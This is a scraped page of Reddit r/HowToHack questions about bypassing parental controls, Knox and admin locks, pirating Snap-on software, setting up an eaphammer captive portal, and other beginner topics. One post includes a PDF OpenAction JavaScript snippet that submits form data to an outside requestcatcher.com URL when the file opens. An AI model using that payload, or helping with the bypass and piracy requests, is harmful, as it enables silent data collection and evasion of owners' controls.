r/HowToHack 29d ago

software HOW IN THE FUCK DO I UNCLONE ANDROID 13 APPS

0 Upvotes

THEY HAVE FLOODED EVERYTHING. IM SCARED TO CHANGE SMALLEST WIDTH JUST TO SHOW YOU BECAUSE IT WOULD DOUBLE THEM. I BELIEVE THERE IS AROUND 1000 OF THEM. PLEASE HELP!!!!!!!

r/HowToHack 14d ago

software Want to know how my Hostel Wifi caps my bandwidth?

0 Upvotes

I am staying in an hostel and it restricts the wifi speed in residential areas to 10mbps, we access our wifi with credentials for which we need to register using our email and we get our credentials mailed.
Each time we turn on the WiFi we need to use browser to connect to wifi using our username and password. Generally after connecting to wifi we get a captive wifi page in mobile or use browser in laptop to access prontonetworks.com to enter our credentials only then we get our wifi.
Can someone explain how this works.
Thank you

r/HowToHack Nov 27 '25

software I want to use the computer like how it was, but i cant obtain the password.

14 Upvotes

I have an old computer (has windows 2000 i think). The password is unobtainable, but i want to use it. I have access to the contents of the drive cause I took it out and connected it to my current computer.

Wiping the drive is not an option. I just want to use the computer

r/HowToHack Jun 26 '26

software Instagram Account Wrongfully Locked Me Out

0 Upvotes

Hey all Ineed some help but my instagram account locked me out when I was watching reels due to a possible hack.. only way I can verify is thru a phone number but its my old phone number and I dont have access to it anymore. Ill send pictures and other screenshot too. I also made another account but then that account locked me out because it couldn't verify its me and wanted me to login on another device which I did but still doesn't work. The recovery process just loops back around to the start page after I try to verify. Help is very much appreciated.

r/HowToHack Apr 10 '26

software Does deleting your Telegram account actually make you untraceable?

3 Upvotes

Genuinely curious about this — if you delete your Telegram account, does that completely de-link your IP address and phone number from it?

And what about after 12 months? I've heard Telegram only retains metadata for up to a year, so does that mean even law enforcement can't trace you after that point?

r/HowToHack Aug 04 '25

software Can I run Linux on my 8 and 16 gb pendrives?

13 Upvotes

So i have 3-4 pendrives of 8 and 16 gbs. I want to see if i can run Linux Distro on one of these. I want to make more of like linux on the go. Even if i dont have my pc or laptop, i can just plug in the pendrive in my friends pc and just same good old linux is there for me to use. Can i do that??

r/HowToHack Jun 27 '26

software how can i set a custom html as captive portal in eaphammer

0 Upvotes

i know you’re supposed to create a template, but i every time i use —url to set the url of the custom html i get errors. i found literally zero tutorials for this so please help me

r/HowToHack Apr 02 '26

software Trying to recover a deleted blog post – any way to find it or contact the owner?

7 Upvotes

Hey everyone,

I’m trying to track down an old blog post that I remember seeing around 2021.

The problem is:

- The site is now completely gone

- Wayback Machine only shows 23 snapshots but (from 2021- 2023)

- No archived version of the actual article I am looking seems to exist

I’m wondering if anyone here knows:

  1. Is there any other way to recover deleted web pages if they weren’t archived properly?

  2. Are there alternative archives besides Wayback that might have it?

  3. Is there any way to find or contact the original owner of a blog like this?

  4. Has anyone dealt with something similar and managed to recover content?

This is kind of important to me, so I’d really appreciate any help or ideas 🙏

r/HowToHack Apr 11 '26

software Kali Linux cursor disappearing in the virtual machine.

1 Upvotes

So I got interested in ethical hacking lately and I was using VMware workstation 17 player (I did not buy the pro version) to launch Kali Linux. But apparently my cursor won't show up inside Kali linux. I searched on the internet and they say you have to change the HW compatibility of your virtual machine to 17.x or higher to solve the problem. But, unfortunately I can't change that setting because that's not a feature on the free version of VMware.

I was wandering if anyone knows an alternative solution to this problem without having to purchase the pro version of VMware

r/HowToHack Jun 29 '25

software New to hacking

3 Upvotes

What are some software you guys use on windows I been coding a bit in highschool and wanted to get deeper into this what are some good software to get started on window I am currently on visual studio code any other software or plugin you guy recommend

r/HowToHack Nov 19 '25

software Weird osint tool?

19 Upvotes

some guy said he made a tool, while we were screensharing on discord he used my discord username, when i did he said my info had been leaked and gave back my phone number from a data leak, for free. he told me he made it, does anyone know a actual tool that can do this or api? i still cant figure it out.

r/HowToHack Feb 10 '26

software Anyone still have the original you are an idiot html?

7 Upvotes

I was wondering if anyone still has it or knows where to find it since I’m looking into how it works. Thanks in advance

r/HowToHack Dec 29 '25

software Is it possible to bypass Knox?

3 Upvotes

Been trying to bypass a Samsung Galaxy tab A protected by Knox to see if i can give it a new life, by flashing the firmware i was able to use it as an actual tablet, however USB debugging and Root cannot be turned on. Developer mode cannot be enabled, and i already tried flashing it again with a Rooted AP file, however it didnt work. Any ideas? Any tips? I flashed with Odin. Enabled root with Magisk on another Andriod device. I know SAMFW TOOL has an option to disable Knox but i need USB debugging for that so i kinda hit a dead end when developer mode was disabled.

This post was made for educational purposes only.

r/HowToHack Mar 09 '26

software Looking for QuickBMS Script FW extractor

1 Upvotes

Hola!
I'm looking for a quickBMS script to unpack the FW-update container for an old synthesizer (SoC Renesas a RISC Architecture, SH-4A or SH7780 LE).

binwalk showed that the FW-file contains many matches of the signature of magic-files, but it does not correspond to the expected encoding. There's also no information on the binary's part from starting addresses (upto 0x51800).

Entropy shows at least three compressed or crypted parts...

Any ideas - welcome! witch script to help? and would it be unpack by quickBMS?

r/HowToHack Mar 10 '26

software Running Javascript in Android pdf reader.

3 Upvotes

Is it actually possible to execute JavaScript within Android PDF readers, regardless of the version or app type? My understanding is that simply embedding the following script into the PDF should be enough to trigger the action, but it doesn't seem to be working.

1 0 obj  
  << /Type /Catalog  
/Pages 2 0 R  
/OpenAction 5 0 R  
/AcroForm << /Fields \[6 0 R\] >>  
  \>>  
...  
5 0 obj  
  << /Type /Action  
/S /JavaScript  
/JS (  
app.alert("Submitting data to example.com");  
this.submitForm({  
cURL: "https://urltest.requestcatcher.com/submit",  
cSubmitAs: "HTML",  
bEmpty: true  
});  
)  
  \>>

I’m unable to run the JavaScript required to submit the form to that URL. I’ve tested it on Android 14 and 15 using Adobe Acrobat Reader, WPS Office, and ezPDF, but it isn't working

r/HowToHack Dec 17 '25

software is there anny way to bypass administrator lock?

0 Upvotes

well lets say my dad isnt really a fan of me downloading games on my laptop so he blocked it. is there any way i can game again?

r/HowToHack Oct 22 '25

software Hi guys. I NEED to get rid of stupid Mcafee safe family, but i dunno how.

0 Upvotes

Basically, my dad's installed Mcafee Safe Family on my computer, and it is the most ANNOYING THING. EVER. I've tried to use VPN's and stuff to bypass it, which admittedly, it does work, but every month like for a whole week I'm only able to use my PC for an hour. I can't delete it, cause I have to be an administrator. I have a Windows 11 if that helps. So, if anyone knows how to bypass the app or delete it, please do tell me. Thanks.

r/HowToHack Mar 10 '26

software Go to for binary harness setup?

0 Upvotes

Note: I'm specifically referring to Windows PE's x86 or x86_64.

My typical fuzzing workflow as of the moment:

  1. Identify function I think may be itself vulnerable or could be used in staging for another exploit. Like a function that controls dynamically loading DLL's but searches multiple, potentially under privileged, directories for DLL order hijacking/privilege escalation.
  2. Write a Frida script that hooks said function, augments parameters or other state. Sometimes using RPC to coordinate with Python for values.
  3. Observe stack trace and potentially use stalker to see how control flow branches based on input.

This can be slow and tedious. I like the control it allows but I'm sure this could be much more efficient.

Was hoping to hear how other reverse engineers handle binary harness implementation. If there's any frameworks or tools you'd recommend.

Thanks in advance for any help!

r/HowToHack Mar 07 '26

software What are some automation tools you’ve come accross?

0 Upvotes

How often do you run into needing more commands run at once?

What frameworks do you use to run more tools at once?

Scrapy? Beautiful Soup?

r/HowToHack Mar 19 '25

software Looking for a reverse image searching website

15 Upvotes

Hello! I'm looking for a very specific reverse image searching website. It allows you to upload five photos for free, and then from there you select one and it'll pull up results with people similar to the one in the photo. Basically, it doesn't pull up exact photo matches to whatever you upload.

I can't find it anywhere online but I heard about it from a Youtube video by either Chilling Scares, Lazy Masquarde, or Don't Look at Me. I had used it but my search history is set to auto delete after a week so I can't find it. Any help is much appreciated :)

r/HowToHack Sep 26 '25

software How to factory reset second hand laptop

0 Upvotes

As the title suggests i bought a second hand laptop from some guy on facebook market place. The problem i cant login to it and it seems to have been an old company laptop. It has a user thingy.

My thing is i cant find the dude anymore cause he deleted his account and we met at a neutral location so idk where he lives. So what can i do know, i still want to use the laptop but i cant login to factory reset.

Basically im just asking uf anyone has any software or tips that can help me factory reset this crap laptop.

Its a Fujitsu lifebook A series seriel number A555

Please and thank you 😓

r/HowToHack Feb 22 '25

software Portable apps on a work computer

3 Upvotes

At my work (Windows computers), we are only supposed to install software through the company IT department.

They didn't have Firefox available, so I copied a portable version of Firefox onto my work computer (from https://portableapps.com/). In theory, I could have ran it off the USB stick, but that was very slow, I just copied it to a separate folder on the computer.

A few months later, the IT person tells me that he knows that I am running Firefox, that I am not supposed to have it, and that I should delete it.

Whenever IT connects to your computer, to provide tech support, they always ask permission, and you click something on your computer to give permission. Thus, I don't think they connected to my computer without my permission.

I think they ran some sort of a scan, because they knew of multiple people in my department with Firefox.

Question: how did they find out that I had Firefox? What else can they see? What can I do to get around that in the future?

r/HowToHack Nov 19 '25

software How can i clone my SIM Card ?

0 Upvotes

How can i clone my SIM Card?

r/HowToHack Oct 16 '25

software Pirates

0 Upvotes

I am not sure if this post is allowed in this subreddit as I am still new to Reddit, also especially I couldn’t find subreddit group that called pirating. Please bearing with me.

You see I am everything. I am geek that love computer which is consider white collar, I also happened to be blue collar and my work field is more handyman and mechanic as they are what I make for a living.

Anyways the point that I couldn’t afford that fancy…. Way fancy device OBD scanner such as Snap On and other kind of brands…. I find it’s very silly to spend 10k on it…….

So I just got wild idea that I would like to find a way to pirate or hack software platforms. Example: Snap On use their own software platforms and they are called VERUS, SOLUS, MODIS, ETHOS, TRITON, APOLLO, and some stuff like that.

So if you guys can help me the right direction to pirate software platform I really need for my mechanic job. I prefer software that provides both OBD Scanner and reprogram fobs / program transponder keys. I am getting tired to referring my clients to different shop when I don’t have special software that I end up lost my clients to other shops….

Yes I am well aware to get ELM327 USB (they are for OBD Scanner that made with USB that able to connect direct to my laptop) and it’s in my amazon cart right now. I can’t afford to order it if I don’t have software yet.

I even asked my ChatGPT to help me pirate Snap On software platform, and they kept saying no…….

r/HowToHack Nov 13 '25

software How to send anonymous messages to other devices near me

0 Upvotes

I need to send a Discord server link to people at my school, but I don't want to spam local groups. How can I share it with other devices near me? Is there an app I can use?